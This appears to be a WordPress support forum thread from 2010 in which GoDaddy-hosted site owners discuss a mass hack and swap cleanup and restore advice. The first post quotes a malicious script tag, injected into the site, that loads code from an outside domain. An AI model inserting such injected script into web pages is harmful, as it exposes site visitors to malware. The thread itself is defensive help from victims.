Forums

WordPress › Support » Plugins and Hacks

1 2

Site Hacked (59 posts)

  1. dailyotaku
    Member
    Posted 2 weeks ago #

    First off sorry if this is the wrong section. My site is self hosted on WordPress 2.8.6 and has been hacked of as yesterday; a bit of code;

    <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

    was put into the site and some other code, I am in the process of deleting everything right now, MySQL, and all my files. but the above code is still here. What should I do to get rid of it? And what could be the cause of this virus, and tips/suggestions would be awesome, thanks

    site at the moment ( Safe) view-source:http://www.dailyotaku.com/

  2. Snat
    Member
    Posted 2 weeks ago #

    Follow each one: http://codex.wordpress.org/FAQ_My_site_was_hacked

  3. dailyotaku
    Member
    Posted 2 weeks ago #

    thanks but that hardly helps

  4. samboll
    moderator
    Posted 2 weeks ago #

    thanks but that hardly helps

    what kind of help do you want
    you're the only one who can fix this

    some additional "help"

    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

    http://ottopress.com/2009/hacked-wordpress-backdoors/

  5. redkathy
    Member
    Posted 2 weeks ago #

    Will a restore from an earlier date be sufficient to fix the problem?

  6. samboll
    moderator
    Posted 2 weeks ago #

    Will a restore from an earlier date be sufficient to fix the problem?

    possibly if all of the files are clean

  7. redkathy
    Member
    Posted 2 weeks ago #

    Thanks for responding. I'm in the process now. This is the second hack with godaddy this month. Two different redirects so can I assume two different hacks?

  8. Steve D
    Member
    Posted 2 weeks ago #

    Goddaddy is experiencing another hacker assault (attack occured 5/1/10 at about 3:35am.) similar to what NS has been going through all of April and I expect is trying to ward off again today. NS has shut down FTP since last night.

    I'm seeing many goddaddy wp customers reporting on this latest round this morning. Your only option is to be prepared for lot's of headaches. I've been working since April 18 to clean up my platform and things still aren't quite right.

    Your main concern right now should be intrusion monitoring. Clean up your site the best you can, backup nightly, look for suspicious file changes daily.

    http://ddanchev.blogspot.com/2010/04/godaddys-mass-wordpress-blogs.html

  9. dailyotaku
    Member
    Posted 2 weeks ago #

    I restored everything virus is gone for now, quick question am using wp-download manger backup and the images don't show on the site, and plugins don't work possible reasons for this?

    thanks for the advice steve

  10. Steve D
    Member
    Posted 2 weeks ago #

    images don't show on the site . .

    That's a permissions issue. NS instructed everyone to reset permissions.
    That worked and the images showed up. The only other thing I noticed through all this is a problem with permissions remaining firmly set on my hosts end. I would set them but they would change themselves back to the undesired permission. Very strange.

    I am coming to to the conclusion at this point that these attacks on both NS and GD are being launched by some reasonably sophisticated hacker operations. Major "surprise attacks" including rouge accounts, etc.

    http://www.nationaldefensemagazine.org/archive/2010/May/Pages/RussianCyberthiefCaseIllustratesSecurityRisks.aspx

  11. dailyotaku
    Member
    Posted 2 weeks ago #

    what should I set the permissions to and where?

  12. ClaytonJames
    Member
    Posted 2 weeks ago #

    @dailyotaku

    I couldn't help but notice you may be restoring a version of WordPress 2.8.

    This is interesting information ....(from GDHosting)

    http://wordpress.org/support/topic/391658?replies=4#post-1498431

    And some good information located here: Hardening WordPress with points of interest located at item 1. Keep up to date with the latest WP version, under the heading " Vulnerabilities in the WordPress package itself"

    Just some more information for consideration.

  13. dd@sucuri.net
    Member
    Posted 2 weeks ago #

    Lots of sites got hacked at GoDaddy today. Not only Worpdress, but also Joomla and simple html-only sites.

    It seems a problem on Godaddy itself. LinkL
    http://blog.sucuri.net/2010/05/second-round-of-godaddy-sites-hacked.html

  14. dailyotaku
    Member
    Posted 2 weeks ago #

    thanks for the tip, updated it to latest version far as i can see. And added some security plugins

  15. Steve D
    Member
    Posted 2 weeks ago #

    what should I set the permissions to and where?

    You may have something in your Godaddy account manager that says Reset Permissions. You can try calling support or browse around.

    That may not even help right now until Godaddy get's things under control. Your main goal is to look into what backups you may or not have available on your servers side. Or your side of things.

    They should be willing to clean your and others sites free. This is what NS has been doing. In part to prevent further reinfection if somethings hiding in unattended sites that owners haven't checked or logged into in three weeks, or two months.

  16. dailyotaku
    Member
    Posted 2 weeks ago #

    I wish godaddy helped us like NS. Godaddy didn't do anything, gave me a link to a bad guide and your own your own.

  17. Steve D
    Member
    Posted 2 weeks ago #

    For all the complaints and frustrations NS has done everything possible to get this thing under control and get everyone cleaned up. They've also taken it seriously enough to bring in law enforcement and additional security consultants.

    An internal breach is serious stuff.

  18. dd@sucuri.net
    Member
    Posted 2 weeks ago #

    @Steve D: I agree with you. NS response was pretty good and they helped everyone who called and asked for help.

    I am not seeing the same with GoDaddy yet.

  19. dailyotaku
    Member
    Posted 2 weeks ago #

    times to switch hosts!

  20. seriesgo
    Member
    Posted 2 weeks ago #

    My english is so bad. Since today at 3:00 am (gt-5 Colombia) my site was hacked, i dont know why is the problem with goddady, because this problem happened about fifty days ago. ¿What is NS??

  21. Steve D
    Member
    Posted 2 weeks ago #

    Two different redirects so can I assume two different hacks?

    Hard to tell but obviously these attacks have been extremely "organized" and formidable.

    Look at this time line so you are prepared mentally if these attacks being launched on GD turn out to be similar in their intensity.

    Timeline of Events:

    April 7: Database injections are identified on our WordPress hosted accounts.
    Actions: websites are scanned and cleaned and steps are commenced to contain the issue.

    April 16: Additional malicious code appears on customers’ website files.
    Actions: operations team continues to run scans that identify code and clean customer websites.

    April: 18-24: The criminals dynamically inject code on customers’ websites and change signatures each time. The criminals add viruses and/or malware to customers’ sites.
    Actions: security and network experts work to contain the infections and prevent additional issues.

    April 25-present: Security and network teams confirm that security measures continue to contain the malicious code.

    Ongoing: We continue to monitor and implement additional measures as needed to protect our customers. Customers who have not logged in to their sites for at least three weeks are now reporting infections and are being escalated to technical services. The security team confirmed that these are not new cases of infections.

  22. Steve D
    Member
    Posted 2 weeks ago #

    seriesgo NS is Network Solutions.

  23. seriesgo
    Member
    Posted 2 weeks ago #

    Gracias Steve, acabo de restaurar complementamente mi sitio de godady al dia 28 de abril gracias a la utilidad de file manager. ¿Qué nos aconsejaria a los que somos víctimas de este problema? . Un dato curioso es que tengo diversos sitios afectados, y los que están siendo víctima de la vulnerabilidad son los que están corriendo bajo php4, ¿será una simple casualidad?

    Saludos.

  24. redkathy
    Member
    Posted 2 weeks ago #

    FYI - Godaddy users. It is true Godaddy denies any responsibility. I doubt yuo will recieve assistance without paying the minimum 150.00 fee.

    In the Go Daddy file manager you have the ability to restore your sites to an earlier date. I just completed restoring 6 sites and so far(fingers crossed) I have removed the exploit. My source files are clean. Hope this helps!

  25. jeffrev01
    Member
    Posted 2 weeks ago #

    First of all, this is not a GoDaddy issue. I have several friends with blogs hosted on other servers that are suffering the same fate. GoDaddy does have a great feature in the Account Management called the File Manager, which allows files to be restored from a previous calendar date. You can call GoDaddy support and they should be able to walk you through the process of using the File Manager.

    As for the hacks themselves, I see this more as a WordPress issue than a server side issue. All of the files hacked on my site are the core WordPress PHP files. Perhaps the next update of WordPress will look at ways of locking the file permissions down to keep the hacks from changing them and injecting all this nasty code. I do know one thing, this can certainly suck the life out of the average blog owner.

  26. Steve D
    Member
    Posted 2 weeks ago #

    First of all, this is not a GoDaddy issue.

    What if in fact Goddaddy has been breached-ambushed and this is just the beginning of what could possible be a full assault similar to the attack on NS?

    Certainly with all the evidence out there they've taken this into consideration.

  27. Steve D
    Member
    Posted 2 weeks ago #

    http://wordpress.org/extend/plugins/wp-db-backup/faq/

  28. ranganathan
    Member
    Posted 2 weeks ago #

    First of all, this is not a GoDaddy issue. I have several friends with blogs hosted on other servers that are suffering the same fate.

    As for the hacks themselves, I see this more as a WordPress issue than a server side issue.

    its not just wp which is being hacked, other forum softwares are being hacked too !

    so it has to be godaddy's issue.

  29. WpBlogHost
    Member
    Posted 2 weeks ago #

    Here's how to fix this hack...

    First, let me say that any web host could be susceptible to a skilled hacker. It's even happened to sites like YouTube, Twitter, Facebook, banks, government sites/hosting... you name it, all of which do everything possible to prevent these things from happening.

    If you switch hosts, it could happen to your new host as well.

    For GoDaddy users, here's how you fix this problem.

    The good news is that this hack doesn't appear to do anything to your database, just all file extensions with the .php at the end.

    First, back up your database and all your web hosting files (even though they are infected) to your computer. Always always always back things up.

    Second, log into your web hosting control panel and go to your File Manager.

    Click on the "History" button on the left (just above the list of your directory structure).

    You should see then a list of all your files from previous days listed there. So if your site is hacked on May 1st, be sure you're looking at April 30th's backup. You should see the words "Changed" next to each file / folder which has been infected.

    As a check, try opening the index.php file and make sure the base64 code is not located in there. If it's not, then you're probably good to go ahead and use this date's backup; if it's there, go back even further in your history.

    Now that you know that date's files are clean, go back to your root folder (current date's folder) by clicking the "Current" button on the left.

    Put a check mark next to all files and folders which which include .php files. This will include your wp-admin, wp-content, wp-includes folders as well as all your root files which end with .php.

    Once those are all deleted, go back to your "History" button and to the date with clean files.

    Check all the files which you had deleted from your Current area and then click "Restore" from the file menu above.

    Once the restore is complete, you should be up and running.

    Hope this helps. Also, you might want to check out how to help stop hacks from happening by visiting these sites:

    WordPress Defender

    http://codex.wordpress.org/FAQ_My_site_was_hacked

    Perishable Press 4G Blacklist

  30. redkathy
    Member
    Posted 2 weeks ago #

    As for the hacks themselves, I see this more as a WordPress issue than a server side issue. All of the files hacked on my site are the core WordPress PHP files. Perhaps the next update of WordPress will look at ways of locking the file permissions down to keep the hacks from changing them and injecting all this nasty code. I do know one thing, this can certainly suck the life out of the average blog owner.

    I have 6 sites written in php, not all wordpress, and ALL were hacked. The problem is most certainly with Godaddy.

Reply »

You must log in to post.

About this Topic

Tags